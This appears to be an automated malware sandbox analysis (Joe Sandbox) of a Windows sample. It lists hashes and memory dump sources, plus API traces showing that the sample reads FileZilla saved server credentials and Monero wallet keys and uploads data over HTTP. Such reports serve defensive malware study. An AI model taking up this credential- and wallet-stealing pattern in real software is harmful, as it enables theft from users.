                          • Instruction ID: 8a2930c0b164d87101171c77d6bbb771db8b15e760b817ef626a08ae4521c5d9
                          • Opcode Fuzzy Hash: 143b5be348379f211606af6e5973f90fff61db65041019bd3b0858e73cc7828a
                          • Instruction Fuzzy Hash: 7CA16D72A087519BD308CF25C89075BF7E2EFC8710F1ACA3DA8999B254D774E9419B82
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f2812867bb457751227ef0114f796f1ff1fb1f35c093401ff1a0b9e042c8fc61
                          • Instruction ID: 7b8b2d771581c47cdd222d391f47543857f3a2fbb11dce2607ed5188f0bdcee8
                          • Opcode Fuzzy Hash: f2812867bb457751227ef0114f796f1ff1fb1f35c093401ff1a0b9e042c8fc61
                          • Instruction Fuzzy Hash: B8614BF3D082109FE3046A2DDC4576ABBD9EFA4320F1A463DEAD8D3784E9395C1586D2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86ac20e7a8eeb2ed65c857d8eb3220bf7392920dee59ceeb5589ebf081e9ca61
                          • Instruction ID: 4c34edb7a9ac9a4da01ec95acaec8a3f699d472973068e9e7e6ea02313396704
                          • Opcode Fuzzy Hash: 86ac20e7a8eeb2ed65c857d8eb3220bf7392920dee59ceeb5589ebf081e9ca61
                          • Instruction Fuzzy Hash: 4B512EF3A0D2005FE7089E2DDC9177AB7D5EF94720F1A493DEAC5C3380E53958058696
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5dad469fd3f2883f41415a9c412404a8dc94390dbd34234e1cf2a2335c50ef4
                          • Instruction ID: b0c34bf04133cb380fcb75cdd4a1d7ea874574763cb76d1cb2ba04529be03c0c
                          • Opcode Fuzzy Hash: e5dad469fd3f2883f41415a9c412404a8dc94390dbd34234e1cf2a2335c50ef4
                          • Instruction Fuzzy Hash: 704179F39086349FE3156928DC857BAB7D4EB54361F0B463DEFC593B84E839180582D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                          • Instruction ID: eee516e986790157c2010e9f8dcf2a762141cd74d176335cf7bc9b07d0d6be57
                          • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                          • Instruction Fuzzy Hash: 2C513B62E09BD589CB058B7944502EEBFB21FE6210F1E839EC4981F383C3759689D3E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fafe65eebbe0cb669ff1efd4d9d8410eeca12be133b00af863b04a521c9b013
                          • Instruction ID: f217e58950ce1d377169938b9b6526b45b12495ab066869b64668252da3a809a
                          • Opcode Fuzzy Hash: 7fafe65eebbe0cb669ff1efd4d9d8410eeca12be133b00af863b04a521c9b013
                          • Instruction Fuzzy Hash: EA31D1F3A182009BE304BD7DED8536AB7D6EBD4320F2A863CDAD5C7780E97C94058652
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a1714a75b3a0fd3f42eb43bbd75224800f47e1dfd6c06878719c02c43e555074
                          • Instruction ID: 187d93af1d521edb9ad6eb443697805b1dff4eff6c9bb57025b7d4c8df263f98
                          • Opcode Fuzzy Hash: a1714a75b3a0fd3f42eb43bbd75224800f47e1dfd6c06878719c02c43e555074
                          • Instruction Fuzzy Hash: D41126B7A592280BF354987ADC557A3768AD780360F3BC93E9E14D7A89DC7E5C0202C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                          • Instruction ID: 4d4380f719737e920eca18c290049424b63e8615d1407fedd07d3ef3da97591e
                          • Opcode Fuzzy Hash: fa89f657aff6296ecb1601ee23405aced359b6e8af49850df061194d60f6f807
                          • Instruction Fuzzy Hash: E5D0C9716097114FC3688F1EB440946FAE8DBD8320715C53FA09AC3750C6B094418B54
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 00038F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00038F9B
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00040DBF,00040DBE,00040DBB,00040DBA), ref: 000304C2
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000304C9
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 000304E5
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000304F3
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 0003052F
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 0003053D
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00030579
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 00030587
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000305C3
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000305D5
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 00030662
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 0003067A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 00030692
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000306AA
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 000306C2
                          • lstrcat.KERNEL32(?,profile: null), ref: 000306D1
                          • lstrcat.KERNEL32(?,url: ), ref: 000306E0
                          • lstrcat.KERNEL32(?,00000000), ref: 000306F3
                          • lstrcat.KERNEL32(?,00041770), ref: 00030702
                          • lstrcat.KERNEL32(?,00000000), ref: 00030715
                          • lstrcat.KERNEL32(?,00041774), ref: 00030724
                          • lstrcat.KERNEL32(?,login: ), ref: 00030733
                          • lstrcat.KERNEL32(?,00000000), ref: 00030746
                          • lstrcat.KERNEL32(?,00041780), ref: 00030755
                          • lstrcat.KERNEL32(?,password: ), ref: 00030764
                          • lstrcat.KERNEL32(?,00000000), ref: 00030777
                          • lstrcat.KERNEL32(?,00041790), ref: 00030786
                          • lstrcat.KERNEL32(?,00041794), ref: 00030795
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00040DB7), ref: 000307EE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 4189ee9c0b9cc1faa45b9c8921d44550107a71fc00b808891047885db88817a5
                          • Instruction ID: 09ff1fcc8d2297ce5744f59c841a46b1cf877e97d47969786eb623f6cb9fbba9
                          • Opcode Fuzzy Hash: 4189ee9c0b9cc1faa45b9c8921d44550107a71fc00b808891047885db88817a5
                          • Instruction Fuzzy Hash: 2ED14171E14208ABDB05EBE0DD6AEFEB73DAF15340F008564F24676092DF34AA49CB65
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 00024800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                            • Part of subcall function 00024800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00025A48
                          • StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00025A63
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00025BE3
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FDEA88,00000000,?,00FDA420,00000000,?,00041B4C), ref: 00025EC1
                          • lstrlen.KERNEL32(00000000), ref: 00025ED2
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00025EE3
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00025EEA
                          • lstrlen.KERNEL32(00000000), ref: 00025EFF
                          • lstrlen.KERNEL32(00000000), ref: 00025F28
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00025F41
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00025F6B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00025F7F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00025F9C
                          • InternetCloseHandle.WININET(00000000), ref: 00026000
                          • InternetCloseHandle.WININET(00000000), ref: 0002600D
                          • HttpOpenRequestA.WININET(00000000,00FDEA48,?,00FDE068,00000000,00000000,00400100,00000000), ref: 00025C48
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • InternetCloseHandle.WININET(00000000), ref: 00026017
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 9c88d554a378f0b2cf9545ba2feb6746574aaba643d9ac460de49aeebd69806b
                          • Instruction ID: 00e017218d2b73ad44460063fce94910a6e9613465bfccaef21fb4ab7f8bea53
                          • Opcode Fuzzy Hash: 9c88d554a378f0b2cf9545ba2feb6746574aaba643d9ac460de49aeebd69806b
